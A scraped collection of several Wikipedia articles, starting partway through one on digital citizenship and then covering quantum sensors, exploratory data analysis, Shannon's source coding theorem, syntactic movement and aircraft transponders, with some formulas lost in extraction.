Nonetheless, Estonia's e-Residency system has been subject to criticism. Many have pointed out thattax treatieswithin their own countries will play a major role in preventing this idea from spreading to more countries. Another risk is politically for governments to sustain "funding and legislative priorities across different coalitions of power."[23]Most importantly, the threat ofcyberattacksmay disrupt the seemingly optimal idea of having a platform for eIDs, as Estonia suffered its own massive cyberattack in 2007 by Russianhacktivists. Today, the protection of digital services and databases is essential to national security, and many countries are still hesitant to take the next step forward to promote a new system that will change the scale of politics with all its citizens.[citation needed]
Within developed countries, the digital divide, other than economic differences, is attributed to educational levels. A study conducted by the United StatesNational Telecommunications and Information Administrationdetermined that the gap in computer usage and internet access widened 7.8% and 25% between those with the most and least educated, and it has been observed that those with college degrees or higher are 10 times more likely to have internet access at work when compared with those with only a high school education.[24]
Adigital divideoften extends along specific racial lines as well. The difference in computer usage grew by 39.2% between White and Black households and by 42.6% between White and Hispanic households only three years ago.[when?]Race can also affect the number of computers at school, and as expected, gaps between racial groups narrow at higher income levels while widening among households at lower economic levels.Racial disparitieshave been proven to exist irrespective of income, and in a cultural study to determine reasons for the divide other than income, in accordance to the Hispanic community, computers were seen as a luxury, not a need. Participants collectively stated that computer activities isolated individuals and took away valuable time from family activities. In the African-American community, it was observed that they historically have had negative encounters with technological innovations, and with Asian-Americans, education was emphasized, and thus, there was a larger number of people who embraced the rise intechnological advances.[25]
An educational divide also takes place as a result of differences in the use of daily technology. In a report analyzed by theACTCenter for Equity in Learning, "85% of respondents reported having access to anywhere from two to five devices at home. The remaining one percent of respondents reported having access to no devices at home."[26]For the 14% of respondents with one device at home, many of them reported the need to share these devices with other household members, facing challenges that are often overlooked. The data all suggest that wealthier families have access to more devices. In addition, out of the respondents that only used one device at home, 24% of them lived in rural areas, and over half reported that this one device was a smartphone; this could make completing schoolwork assignments more difficult. The ACT recommended that underserved students need access to more devices and higher-quality networks, and educators should do their best to ensure that students can find as many electronic materials through their phones to not place a burden on family plans.[citation needed]
A recent survey revealed that teenagers and young adults spend more time on the internet than watching TV. This has raised a number of concerns about how internet use could impact cognitive abilities.[27]According to a study by Wartella et al., teens are concerned about how digital technologies may have an impact on their health.[28]Digital youth can generally be viewed as the test market for the next generation's digital content and services. Sites such asMyspaceandFacebookhave come to the fore in sites where youth participate and engage with others on the internet. However, due to the lack of popularity of MySpace in particular, more young people are turning to websites such asSnapchat,Instagram, andYouTube.[29]It was reported that teenagers spend up to nine hours a day online, with the vast majority of that time spent on social media websites from mobile devices, contributing to the ease of access and availability to young people.[30]Vast amounts of money are spent annually to research the demographic by hiring psychologists, sociologists and anthropologists in order to discover habits, values and fields of interest.[citation needed]
Particularly in the United States, "Social media use has become so pervasive in the lives of American teens that having a presence on a social network is almost synonymous with being online; 95% of all teens ages 12-17 are now online and 80% of those online teens are users of social media sites".[31][needs update]However, movements such as these appear to benefit strictly those wishing to advocate for their business towards youth. The critical time when young people are developing their civic identities is between the ages 15–22. During this time they develop three attributes, civic literacy, civic skills and civic attachment, that constitute civic engagement later reflected in political actions of their adult lives.[citation needed]
For youth to fully participate and realize their presence on the internet, a quality level of reading comprehension is required. "The average government web site, for example, requires an eleventh-grade level of reading comprehension, even though about half of the U.S. population reads at an eighth-grade level or lower".[32]So despite the internet being a place irrespective of certain factors such as race, religion, and class, education plays a large part in a person's capacity to present themselves online in a formal manner conducive towards their citizenry. Concurrently, education also affects people's motivation to participate online.[citation needed]
Students should be encouraged to use technology with responsibility and ethical digital citizenship promoted. Education on harmful viruses and othermalwaremust be emphasized to protect resources. A student can be a successful digital citizen with the help of educators, parents, and school counselors.[33]
These 5 competencies will assist and support teachers in teaching about digital citizenship:InclusiveI am open to hearing and respectfully recognizing multiple viewpoints and I engage with others online with respect and empathy.InformedI evaluate the accuracy, perspective, and validity of digital media and social posts.EngagedI use technology and digital channels for civic engagement, to solve problems and be a force for good in both physical and virtual communities.BalancedI make informed decisions about how to prioritize my time and activities online and off.AlertI am aware of my online actions, and know how to be safe and create safe spaces for others online.[34]
InternationalOECDguidelines state that "personal data should be relevant to the purposes for which they are to be used, and to the extent necessary for those purposes should be accurate, complete, and kept up to date". Article 8 prevents subjects to certain exceptions. Meaning that certain things cannot be published online revealing race, ethnicity, religion, political stance, health, and sex life. in the United States, this is enforced generally by theFederal Trade Commission(FTC)- but very generally. For example, the FTC brought an action against Microsoft for failing to properly protect customers' personal information.[35]In addition, many have described the United States as being in acyberwarwith Russia, and several Americans have credited Russia to their country's downfall in transparency and declining trust in the government. With several foreign users posting anonymous information through social media in order to gather a following, it is difficult to understand whom to target and what affiliation or root cause they may have of performing a particular action aimed to sway public opinion.[36]
The FTC does play a significant role in protecting the digital citizen. However, individuals' public records are increasingly useful to the government and highly sought after. This material can help the government detect a variety of crimes such as fraud, drug distribution rings, terrorist cells. it makes it easier to properly profile a suspected criminal and keep an eye on them. Although there are a variety of ways to gather information on an individual through credit card history, employment history, and more, the internet is becoming the most desirable information gatherer thanks to its façade of security and the amount of information that can be stored on the internet.Anonymityhas proven to be very rare online asISPscan keep track of an individual's activity online.[37]
Digital citizenship is a term used to define the appropriate and responsible use of technology among users. Three principles were developed by Mike Ribble to teach digital users how to responsibly use technology to become a digital citizen: respect, educate, and protect.[38]Each principle contains three of the nine elements of digital citizenship.[39]
Within these three core principles, there are nine elements to also be considered in regards to digital citizenship:[39]
According to Mike Ribble, an author who has worked on the topic of digital citizenship for more than a decade, digital access is the first element that is prevalent in today's educational curriculum. He cited a widening gap between the impoverished and the wealthy, as 41% of African Americans and Hispanics use computers in the home when compared to 77% of white students. Other crucial digital elements includecommerce,communication,literacy, and etiquette. He also emphasized that educators must understand that technology is important for all students, not only those who already have access to it, in order to decrease the digital divide that currently exists.[10]
Furthermore, in research brought up byCommon Sense Media, approximately six out of ten AmericanK-12teachers used some type of digital citizenship curriculum, and seven out of ten taught some sort of competency skill utilizing digital citizenship.[41]Many of the sections that these teachers focused in on includedhate speech,cyberbullying, and digital drama. A problem with digital technology that still exists is that over 35% of students were observed to not possess the proper skills to critically evaluate information online, and these issues and statistics increased as the grade levels rose. Online videos such as those found on YouTube and Netflix have been used approximately by 60% of the K-12 teachers in classrooms, while educational tools such asMicrosoft OfficeandGoogle G Suitehave been used by around half of the teachers. Social media was used the least, at around 13% in comparison to other digital methods of education.[42]When analyzing the social class differences between schools, it was found that Title I schools were more likely to use digital citizenship curricula than teachers in more affluent schools.
In the past two years,[when?]there has been a major shift to move students from digital citizenship to digital leadership in order to make a greater impact on online interactions. Though digital citizens take a responsible approach to act ethically, digital leadership is a more proactive approach, encompassing the "use of internet and social media to improve the lives, well-being, and circumstances of others" as part of one's daily life.[43]In February 2018, after the Valentine's Day shooting inParkland, Florida, students became dynamic digital citizens, using social media and other web platforms to engage proactively on the issue and push back against cyberbullies and misinformation. Students fromMarjory Stoneman Douglas High Schoolspecifically rallied against gun violence, engaging in live tweeting, texting, videoing, and recording the attack as it happened, utilizing onside digital tools to not only witness what was happening at the time but to allow the world to witness it as well. This allowed the nation to see and react, and as a result, students built a web page and logo for their new movement.[44]They gave interviews to major media outlets and at rallies and protects and coordinated a nationwide march online on March 24 against elected officials at meetings and town halls.[45]The idea of this shift in youth is to express empathy beyond one's self, and moving to seeing this self in the digital company of others.
Nonetheless, several critics state that just as empathy can be spread to a vast number of individuals, hatred can be spread as well. Though the United Nations and groups have been establishing fronts against hate speech, there is no legal definition of hate speech used internationally, and more research needs to be done on its impact.[46]
Along with educational trends, there are overlapping goals of digital citizenship education. Altogether, these facets contribute to one another in the development of a healthy and effective education for digital technology and communication.[47]
There are free and opencurriculadeveloped by different organizations for teaching Digital Citizenship skills in schools:
51. Baron, Jessica. “Posting about Your Kids Online Could Damage Their Futures.”Forbes, Forbes Magazine, 24 Mar. 2022, https://www.forbes.com/sites/jessicabaron/2018/12/16/parents-who-post-about-their-kids-online-could-be-damaging-their-futures/?sh=34d59a4427b7.
1 . Hollebeek, Linda. “Exploring Customer Brand Engagement: Definition and Themes.” Journal of Strategic Marketing, vol. 19, no. 7, Dec. 2011, pp. 555–73. Taylor and Francis+NEJM, https://doi.org/10.1080/0965254X.2011.599493.
|
https://en.wikipedia.org/wiki/Digital_citizen
|
Withinquantum technology, aquantum sensorutilizes properties of quantum mechanics, such asquantum entanglement,quantum interference, andquantum statesqueezing, which have optimized precision and beat current limits insensor technology.[1]The field of quantum sensing deals with the design and engineering of quantum sources (e.g., entangled) and quantum measurements that are able to beat the performance of any classical strategy in a number of technological applications.[2]This can be done withphotonicsystems[3]orsolid statesystems.[4]
Inphotonicsandquantum optics, photonic quantum sensing leveragesentanglement, single photons andsqueezed statesto perform extremely precise measurements. Optical sensing makes use of continuously variable quantum systems such as different degrees of freedom of the electromagnetic field, vibrational modes of solids, andBose–Einstein condensates.[5]These quantum systems can be probed to characterize an unknown transformation between two quantum states. Several methods are in place to improve photonic sensors'quantum illuminationof targets, which have been used to improve detection of weak signals by the use of quantum correlation.[6][7][8][9][10]
Quantum sensors are often built on continuously variable systems, i.e., quantum systems characterized by continuous degrees of freedom such as position and momentum quadratures. The basic working mechanism typically relies on optical states of light, often involving quantum mechanical properties such as squeezing or two-mode entanglement.[3]These states are sensitive to physical transformations that are detected by interferometric measurements.[5]
Quantum sensing can also be utilized in non-photonic areas such asspin qubits,trapped ions,flux qubits,[4]andnanoparticles.[11]These systems can be compared by physical characteristics to which they respond, for example, trapped ions respond to electrical fields while spin systems will respond to magnetic fields.[4]Trapped Ionsare useful in their quantized motional levels which are strongly coupled to the electric field. They have been proposed to study electric field noise above surfaces,[12]and more recently, rotation sensors.[13]
In solid-state physics, a quantum sensor is a quantum device that responds to a stimulus. Usually this refers to a sensor, which hasquantized energy levels, usesquantum coherenceor entanglement to improve measurements beyond what can be done with classical sensors.[4]There are four criteria for solid-state quantum sensors:[4]
Quantum sensors have applications in a wide variety of fields including microscopy, positioning systems, communication technology, electric and magnetic field sensors, as well as geophysical areas of research such as mineral prospecting andseismology.[4]Many measurement devices utilize quantum properties in order to probe measurements such asatomic clocks,superconducting quantum interference devices, andnuclear magnetic resonancespectroscopy.[4][14]With new technological advancements, individual quantum systems can be used as measurement devices, utilizingentanglement,superposition, interference andsqueezingto enhance sensitivity and surpass performance of classical strategies.
A good example of an early quantum sensor is anavalanche photodiode(APD). APDs have been used to detect entangledphotons.With additional cooling and sensor improvements can be used wherephotomultiplier tubes(PMT) in fields such as medical imaging. APDs, in the form of 2-D and even 3-D stacked arrays, can be used as a direct replacement for conventional sensors based onsilicondiodes.[15]
TheDefense Advanced Research Projects Agency(DARPA) launched a research program in optical quantum sensors that seeks to exploit ideas fromquantum metrologyandquantum imaging, such asquantum lithographyand theNOON state,[16]in order to achieve these goals with optical sensor systems such aslidar.[6][17][18][19]TheUnited Statesjudges quantum sensing to be the most mature of quantum technologies for military use, theoretically replacingGPSin areas without coverage or possibly acting withISRcapabilities or detecting submarine or subterranean structures or vehicles, as well asnuclear material.[20]
For photonic systems, current areas of research consider feedback and adaptive protocols. This is an active area of research in discrimination and estimation of bosonic loss.[21]
Injecting squeezed light intointerferometersallows for higher sensitivity to weak signals that would be unable to be classically detected.[1]A practical application of quantum sensing is realized in gravitational wave sensing.[22]Gravitational wave detectors, such asLIGO, utilizesqueezed lightto measure signals below thestandard quantum limit.[23]Squeezed lighthas also been used to detect signals below thestandard quantum limitinplasmonicsensors andatomic force microscopy.[24]
Quantum sensing also has the capability to overcome resolution limits, where current issues of vanishing distinguishability between two close frequencies can be overcome by making the projection noise vanish.[25][26]The diminishing projection noise has direct applications in communication protocols and nano-Nuclear Magnetic Resonance.[27][28]
Entanglement can be used to improve upon existingatomic clocks[29][30][31]or create more sensitivemagnetometers.[32][33]
Quantum radaris also an active area of research. Current classical radars can interrogate many target bins while quantum radars are limited to a single polarization or range.[34]A proof-of-concept quantum radar or quantum illuminator using quantum entangled microwaves was able to detect low reflectivity objects at room-temperature – such may be useful for improved radar systems, security scanners and medical imaging systems.[35][36][37]
Inneuroimaging, the first quantum brain scanner uses magnetic imaging and could become a novel whole-brain scanning approach.[38][39]
Quantum gravity-gradiometersthat could be used tomapand investigate subterraneans are also in development.[40][41]
|
https://en.wikipedia.org/wiki/Quantum_sensor
|
Note to admins: In case of doubt, remove this template and post a message asking for review atWT:CP.Withthis script, go tothe history with auto-selected revisions.
Note to the requestor: Make sure the page has already been reverted to a non-infringing revision or that infringing text has been removed or replaced before submitting this request. This template is reserved for obvious cases only, for other cases refer toWikipedia:Copyright problems.
Instatistics,exploratory data analysis(EDA) is an approach ofanalyzingdata setsto summarize their main characteristics, often usingstatistical graphicsand otherdata visualizationmethods. Astatistical modelcan be used or not, but primarily EDA is for seeing what the data can tell beyond the formal modeling and thereby contrasts with traditional hypothesis testing, in which a model is supposed to be selected before the data is seen. Exploratory data analysis has been promoted byJohn Tukeysince 1970 to encourage statisticians to explore the data, and possibly formulate hypotheses that could lead to new data collection and experiments. EDA is different frominitial data analysis (IDA),[1][2]which focuses more narrowly on checking assumptions required for model fitting and hypothesis testing, and handling missing values and making transformations of variables as needed. EDA encompasses IDA.
Tukey defined data analysis in 1961 as: "Procedures for analyzing data, techniques for interpreting the results of such procedures, ways of planning the gathering of data to make its analysis easier, more precise or more accurate, and all the machinery and results of (mathematical) statistics which apply to analyzing data."[3]
Exploratory data analysis is a technique to analyze and investigate a dataset and summarize its main characteristics. A main advantage of EDA is providing the visualization of data after conducting analysis.
Tukey's championing of EDA encouraged the development ofstatistical computingpackages, especiallySatBell Labs.[4]The S programming language inspired the systemsS-PLUSandR. This family of statistical-computing environments featured vastly improved dynamic visualization capabilities, which allowed statisticians to identifyoutliers,trendsandpatternsin data that merited further study.
Tukey's EDA was related to two other developments instatistical theory:robust statisticsandnonparametric statistics, both of which tried to reduce the sensitivity of statistical inferences to errors in formulatingstatistical models. Tukey promoted the use offive number summaryof numerical data—the twoextremes(maximumandminimum), themedian, and thequartiles—because these median and quartiles, being functions of theempirical distributionare defined for all distributions, unlike themeanandstandard deviation. Moreover, the quartiles and median are more robust toskewedorheavy-tailed distributionsthan traditional summaries (the mean and standard deviation). The packagesS,S-PLUS, andRincluded routines usingresampling statistics, such as Quenouille and Tukey'sjackknifeandEfron'sbootstrap, which are nonparametric and robust (for many problems).
Exploratory data analysis, robust statistics, nonparametric statistics, and the development of statistical programming languages facilitated statisticians' work on scientific and engineering problems. Such problems included the fabrication of semiconductors and the understanding of communications networks, both of which were of interest to Bell Labs. These statistical developments, all championed by Tukey, were designed to complement theanalytictheory oftesting statistical hypotheses, particularly theLaplaciantradition's emphasis onexponential families.[5]
John W. Tukeywrote the bookExploratory Data Analysisin 1977.[6]Tukey held that too much emphasis in statistics was placed onstatistical hypothesis testing(confirmatory data analysis); more emphasis needed to be placed on usingdatato suggest hypotheses to test. In particular, he held that confusing the two types of analyses and employing them on the same set of data can lead tosystematic biasowing to the issues inherent intesting hypotheses suggested by the data.
The objectives of EDA are to:
Many EDA techniques have been adopted intodata mining. They are also being taught to young students as a way to introduce them to statistical thinking.[8]
There are a number of tools that are useful for EDA, but EDA is characterized more by the attitude taken than by particular techniques.[9]
Typicalgraphical techniquesused in EDA are:
Dimensionality reduction:
Typicalquantitativetechniques are:
Many EDA ideas can be traced back to earlier authors, for example:
TheOpen UniversitycourseStatistics in Society(MDST 242), took the above ideas and merged them withGottfried Noether's work, which introducedstatistical inferencevia coin-tossing and themedian test.
Findings from EDA are orthogonal to the primary analysis task. To illustrate, consider an example from Cook et al. where the analysis task is to find the variables which best predict the tip that a dining party will give to the waiter.[12]The variables available in the data collected for this task are: the tip amount, total bill, payer gender, smoking/non-smoking section, time of day, day of the week, and size of the party. The primary analysis task is approached by fitting a regression model where the tip rate is the response variable. The fitted model is
which says that as the size of the dining party increases by one person (leading to a higher bill), the tip rate will decrease by 1%, on average.
However, exploring the data reveals other interesting features not described by this model.
What is learned from the plots is different from what is illustrated by the regression model, even though the experiment was not designed to investigate any of these other trends. The patterns found by exploring the data suggest hypotheses about tipping that may not have been anticipated in advance, and which could lead to interesting follow-up experiments where the hypotheses are formally stated and tested by collecting new data.
|
https://en.wikipedia.org/wiki/Exploratory_data_analysis
|
Ininformation theory,Shannon's source coding theorem(ornoiseless coding theorem) establishes the statistical limits to possibledata compressionfor data whose source is anindependent identically-distributed random variable, and the operational meaning of theShannon entropy.
Named afterClaude Shannon, thesource coding theoremshows that, in the limit, as the length of a stream ofindependent and identically-distributed random variable (i.i.d.)data tends to infinity, it is impossible to compress such data such that the code rate (average number of bits per symbol) is less than the Shannon entropy of the source, without it being virtually certain that information will be lost. However it is possible to get the code rate arbitrarily close to the Shannon entropy, with negligible probability of loss.
Thesource coding theorem for symbol codesplaces an upper and a lower bound on the minimal possible expected length of codewords as a function of theentropyof the input word (which is viewed as arandom variable) and of the size of the target alphabet.
Note that, for data that exhibits more dependencies (whose source is not an i.i.d. random variable), theKolmogorov complexity, which quantifies the minimal description length of an object, is more suitable to describe the limits of data compression. Shannon entropy takes into account only frequency regularities while Kolmogorov complexity takes into account all algorithmic regularities, so in general the latter is smaller. On the other hand, if an object is generated by a random process in such a way that it has only frequency regularities, entropy is close to complexity with high probability (Shen et al. 2017).[1]
Source codingis a mapping from (a sequence of) symbols from an informationsourceto a sequence of alphabet symbols (usually bits) such that the source symbols can be exactly recovered from the binary bits (lossless source coding) or recovered within some distortion (lossy source coding). This is one approach todata compression.
In information theory, the source coding theorem (Shannon 1948)[2]informally states that (MacKay 2003, pg. 81,[3]Cover 2006, Chapter 5[4]):
Ni.i.d.random variables each with entropyH(X)can be compressed into more thanN H(X)bitswith negligible risk of information loss, asN→ ∞; but conversely, if they are compressed into fewer thanN H(X)bits it is virtually certain that information will be lost.
TheNH(X){\displaystyle NH(X)}coded sequence represents the compressed message in a biunivocal way, under the assumption that the decoder knows the source. From a practical point of view, this hypothesis is not always true. Consequently, when the entropy encoding is applied the transmitted message isNH(X)+(inf.source){\displaystyle NH(X)+(inf.source)}. Usually, the information that characterizes the source is inserted at the beginning of the transmitted message.
LetΣ1, Σ2denote two finite alphabets and letΣ∗1andΣ∗2denote theset of all finite wordsfrom those alphabets (respectively).
Suppose thatXis a random variable taking values inΣ1and letfbe auniquely decodablecode fromΣ∗1toΣ∗2where|Σ2| =a. LetSdenote the random variable given by the length of codewordf(X).
Iffis optimal in the sense that it has the minimal expected word length forX, then (Shannon 1948):
WhereE{\displaystyle \mathbb {E} }denotes theexpected valueoperator.
GivenXis ani.i.d.source, itstime seriesX1, ...,Xnis i.i.d. withentropyH(X)in the discrete-valued case anddifferential entropyin the continuous-valued case. The Source coding theorem states that for anyε> 0, i.e. for anyrateH(X) +εlarger than theentropyof the source, there is large enoughnand an encoder that takesni.i.d. repetition of the source,X1:n, and maps it ton(H(X) +ε)binary bits such that the source symbolsX1:nare recoverable from the binary bits with probability of at least1 −ε.
Proof of Achievability.Fix someε> 0, and let
Thetypical set,Aεn, is defined as follows:
Theasymptotic equipartition property(AEP) shows that for large enoughn, the probability that a sequence generated by the source lies in the typical set,Aεn, as defined approaches one. In particular, for sufficiently largen,P((X1,X2,⋯,Xn)∈Anε){\displaystyle P((X_{1},X_{2},\cdots ,X_{n})\in A_{n}^{\varepsilon })}can be made arbitrarily close to 1, and specifically, greater than1−ε{\displaystyle 1-\varepsilon }(SeeAEPfor a proof).
The definition of typical sets implies that those sequences that lie in the typical set satisfy:
Since|Anε|≤2n(H(X)+ε),n(H(X)+ε){\displaystyle \left|A_{n}^{\varepsilon }\right|\leq 2^{n(H(X)+\varepsilon )},n(H(X)+\varepsilon )}bits are enough to point to any string in this set.
The encoding algorithm: the encoder checks if the input sequence lies within the typical set; if yes, it outputs the index of the input sequence within the typical set; if not, the encoder outputs an arbitraryn(H(X) +ε)digit number. As long as the input sequence lies within the typical set (with probability at least1 −ε), the encoder does not make any error. So, the probability of error of the encoder is bounded above byε.
Proof of converse: the converse is proved by showing that any set of size smaller thanAεn(in the sense of exponent) would cover a set of probability bounded away from1.
For1 ≤i≤nletsidenote the word length of each possiblexi. Defineqi=a−si/C{\displaystyle q_{i}=a^{-s_{i}}/C}, whereCis chosen so thatq1+ ... +qn= 1. Then
where the second line follows fromGibbs' inequalityand the fifth line follows fromKraft's inequality:
sologC≤ 0.
For the second inequality we may set
so that
and so
and
and so by Kraft's inequality there exists a prefix-free code having those word lengths. Thus the minimalSsatisfies
Define typical setAεnas:
Then, for givenδ> 0, fornlarge enough,Pr(Aεn) > 1 −δ. Now we just encode the sequences in the typical set, and usual methods in source coding show that the cardinality of this set is smaller than2n(Hn¯(X)+ε){\displaystyle 2^{n({\overline {H_{n}}}(X)+\varepsilon )}}. Thus, on an average,Hn(X) +εbits suffice for encoding with probability greater than1 −δ, whereεandδcan be made arbitrarily small, by makingnlarger.
|
https://en.wikipedia.org/wiki/Shannon%27s_source_coding_theorem
|
Syntactic movementis the means by which some theories of syntax addressdiscontinuities. Movement was first postulated bystructuralist linguistswho expressed it in terms ofdiscontinuous constituentsordisplacement.[1]Someconstituentsappear to have been displaced from the position in which they receive important features of interpretation.[2]The concept of movement is controversial and is associated with so-calledtransformationalorderivationaltheories of syntax (such astransformational grammar,government and binding theory,minimalist program). Representational theories (such ashead-driven phrase structure grammar,lexical functional grammar,construction grammar, and mostdependency grammars), in contrast, reject the notion of movement and often instead address discontinuities with other mechanisms including graph reentrancies, feature passing, andtype shifters.
Movement is the traditional means of explaining discontinuities such aswh-fronting,topicalization,extraposition,scrambling,inversion, andshifting:[3]
The a-sentences show canonical word order, and the b-sentences illustrate the discontinuities that movement seeks to explain. Bold script marks the expression that is moved, and underscores mark the positions from which movement is assumed to have occurred. In the first a-sentence, the constituentthe first storyserves as the object of the verblikesand appears in its canonical position immediately following that verb. In the first b-sentence, the constituentwhich storylikewise serves as the object of the verb, but appears at the beginning of the sentence rather than in its canonical position following the verb. Movement-based analyses explain this fact by positing that the constituent isbase-generatedin its canonical position but is moved to the beginning of the sentence, in this case because of a question-forming operation.
The examples above use an underscore to mark the position from which movement is assumed to have occurred. In formal theories of movement, these underscores correspond to actual syntactic objects, eithertracesorcopiesdepending on one's particular theory.[4]e.g.
Subscripts help indicate the constituent that is assumed to have left a trace in its former position, the position marked by t.[5]The other means of indicating movement is in terms of copies. Movement is actually taken to be a process of copying the same constituent in different positions and deleting the phonological features in all but one case.[6]Italics are used in the following example to indicate a copy that lacks phonological representation:
There are various nuances associated with each of the means of indicating movement (blanks, traces, copies), but for the most part, each convention has the same goal of indicating the presence of adiscontinuity.
Within generative grammar, various types of movement have been distinguished. An important distinction is the one between head movement and phrasal movement, with the latter type being further subdivided into A-movement and A-bar movement. Copy movement is another more general type of movement.
Argument movement (A-movement) displaces a phrase into a position in which a fixed grammatical function is assigned, such as in movement of the object to the subject position in passives:[7]
Non-argument movement (A-bar movement or A'-movement), in contrast, displaces a phrase into a position where a fixed grammatical function is not assigned, such as the movement of a subject or object NP to a pre-verbal position in interrogatives:
The A- vs. A-bar distinction is a reference to the theoretical status of syntax with respect to the lexicon. The distinction elevates the role of syntax by locating the theory of voice (active vs. passive) almost entirely in syntax (as opposed to in the lexicon). A theory of syntax that locates the active-passive distinction in the lexicon (the passive is not derived via transformations from the active) rejects the distinction entirely.
A different partition among types of movement is phrasal vs. head movement.[8]Phrasal movement occurs when thehead of a phrasemoves together with all its dependents in such a manner that the entirephrasemoves. Most of the examples above involve phrasal movement. Head movement, in contrast, occurs when just the head of a phrase moves, and the head leaves behind its dependents. Subject-auxiliary inversion is a canonical instance of head movement:
On the assumption that the auxiliarieshasandwillare the heads of phrases, such as of IPs (inflection phrases), the b-sentences are the result of head movement, and the auxiliary verbshasandwillmove leftward without taking with them the rest of the phrase that they head.
The distinction between phrasal movement and head movement relies crucially on the assumption that movement is occurring leftward. An analysis ofsubject-auxiliary inversionthat acknowledges rightward movement can dispense with head movement entirely:
The analysis shown in those sentences views the subject pronounssomeoneandsheas moving rightward, instead of the auxiliary verbs moving leftward. Since the pronouns lack dependents (they alone qualify as complete phrases), there would be no reason to assume head movement.
Since it was first proposed, the theory of syntactic movement has yielded a new field of research aiming at providing the filters that block certain types of movement. Calledlocalitytheory,[9]it is interested in discerning the islands and barriers to movement. It strives to identify the categories and constellations that block movement from occurring. In other words, it strives to explain the failure of certain attempts at movement:
All of the b-sentences are now disallowed because of locality constraints on movement. Adjuncts and subjects are islands that block movement, and left branches in NPs are barriers that prevent pre-noun modifiers from being extracted out of NPS.
Syntactic movement is controversial, especially in light ofmovement paradoxes. Theories of syntax that posit feature passing reject syntactic movement outright, that is, they reject the notion that a given "moved" constituent ever appears in its "base" position below the surface: the positions marked by blanks, traces, or copies. Instead, they assume that there is but one level of syntax, and all constituents appear only in their surface positions, with no underlying level or derivation. To address discontinuities, they posit that the features of a displaced constituent are passed up and/or down the syntactic hierarchy between that constituent and itsgovernor.[10]The following tree illustrates the feature passing analysis of a wh-discontinuity in adependency grammar.[11]
The words in red mark thecatena(chain of words) that connects the displaced wh-constituentwhatto its governoreat, the word that licenses its appearance.[12]The assumption is that features (=information) associated withwhat(e.g. noun, direct object) are passed up and down along the catena marked in red. In that manner, the ability ofeattosubcategorizefor a direct object NP is acknowledged. By examining the nature of catenae like the one in red, the locality constraints on discontinuities can be identified.
Ingovernment and binding theoryand some of its descendant theories, movement leaves behind anempty categorycalled atrace.
In such theories, traces are considered real parts of syntactic structure, detectable in secondary effects they have on the syntax. For instance, one empirical argument for their existence comes from theEnglishphenomenon ofwanna contraction, in whichwant tocontractsintowanna. This phenomenon has been argued to be impossible when a trace would intervene between "want" and "to", as in the b-sentence below.[13]
Evidence of this sort has not led to a full consensus in favor of traces, since other kinds of contraction permit an intervening putative trace.[14]
Proponents of the trace theory have responded to these counterarguments in various ways. For instance, Bresnan (1971) argued that contractions of "to" areencliticwhile contractions of tensed auxiliaries areproclitic, meaning that only the former would be affected by a preceding trace.[15]
|
https://en.wikipedia.org/wiki/Trace_(linguistics)
|
Atransponder(short fortransmitter-responder[1]and sometimes abbreviated to XPDR,[2]XPNDR,[3]TPDR[4]or TP[5]) is an electronic device that produces a response when it receives a radio-frequency interrogation. Aircraft havetranspondersto assist in identifying them on air traffic controlradar.Collision avoidance systemshave been developed to use transponder transmissions as a means of detecting aircraft at risk of colliding with each other.[6][7]
Air traffic control(ATC) units use the term "squawk" when they are assigning an aircraft a transponder code, e.g., "Squawk 7421". Squawk thus can be said to mean "select transponder code" or "squawkingxxxx" to mean "I have selected transponder codexxxx".[6]
The transponder receives interrogation from the secondary surveillance radar on 1030 MHz and replies on 1090 MHz.
Secondary surveillance radar (SSR) is referred to as "secondary", to distinguish it from the "primary radar" that works by reflecting a radio signal off the skin of the aircraft. Primary radar determines range and bearing to a target with reasonably high fidelity, but it cannot determine target elevation (altitude) reliably except at close range. SSR uses an active transponder (beacon) to transmit a response to an interrogation by a secondary radar. This response most often includes the aircraft'spressure altitudeand a 4-digitoctalidentifier.[7][8]
A pilot may be requested to squawk a given code by an air traffic controller, via the radio, using a phrase such as "Cessna 123AB, squawk 0363". The pilot then selects the 0363 code on their transponder and the track on the air traffic controller's radar screen will become correctly associated with their identity.[6][7]
Because primary radar generally gives bearing and range position information, but lacks altitude information, mode C andmode Stransponders also report pressure altitude. Mode C altitude information conventionally comes from the pilot's altimeter, and is transmitted using a modifiedGray code, called aGillham code. Where the pilot's altimeter does not contain a suitable altitude encoder, ablind encoder(which does not directly display altitude) is connected to the transponder. Around busyairspacethere is often a regulatory requirement that all aircraft be equipped with altitude-reporting mode C or mode S transponders. In the United States, this is known as aMode C veil. Mode S transponders are compatible with transmitting the mode C signal, and have the capability to report in 25-foot (7.5 m) increments; they receive information from a GPS receiver and also transmit location and speed. Without the pressure altitude reporting, the air traffic controller has no display of accurate altitude information, and must rely on the altitude reported by the pilot via radio.[6][7]Similarly, thetraffic collision avoidance system(TCAS) installed on some aircraft needs the altitude information supplied by transponder signals.
All mode A, C, and S transponders include an "IDENT" switch which activates a special thirteenth bit on the mode A reply known as IDENT, short for "identify". When ground-based radar equipment[9]receives the IDENT bit, it results in the aircraft's blip "blossoming" on the radar scope. This is often used by the controller to locate the aircraft amongst others by requesting the ident function from the pilot, e.g., "Cessna 123AB, squawk 0363 and ident".[6][7]
Ident can also be used in case of a reported or suspected radio failure to determine if the failure is only one way and whether the pilot can still transmitorreceive, but not both, e.g., "Cessna 123AB, if you read, squawk ident".[7]
Transponder codes are four-digit numbers transmitted by an aircraft transponder in response to a secondary surveillance radar interrogation signal to assist air traffic controllers with traffic separation. A discrete transponder code (often called asquawk code) is assigned by air traffic controllers to identify an aircraft uniquely in aflight information region(FIR). This allows easy identification of aircraft on radar.[6][7]
Codes are made of fouroctaldigits; the dials on a transponder read from zero to seven, inclusive. Four octal digits can represent up to 4096 different codes, which is why such transponders are sometimes described as "4096 code transponders".[10]
The use of the word "squawk" comes from the system's origin in the World War IIidentification friend or foe(IFF) system, which was code-named "Parrot".[11][12]
Some codes can be selected by the pilot if and when the situation requires or allows it, without permission from ATC. Such codes are referred to as "conspicuity codes" in the UK.[13]Other codes are generally assigned by ATC units.[6][7]For flights oninstrument flight rules(IFR), the squawk code is typically assigned as part of the departure clearance and stays the same throughout the flight.[6][7]
Flights onvisual flight rules(VFR), when in uncontrolled airspace, will "squawk VFR" (1200 in the United States and Canada, 7000 in Europe). Upon contact with an ATC unit, they will be told to squawk a certain code. When changing frequency, for instance because the VFR flight leaves controlled airspace or changes to another ATC unit, the VFR flight will be told to "squawk VFR" again.[6][7]
In order to avoid confusion over assigned squawk codes, ATC units will typically be allocated blocks of squawk codes, not overlapping with the blocks of nearby ATC units, to assign at their discretion.
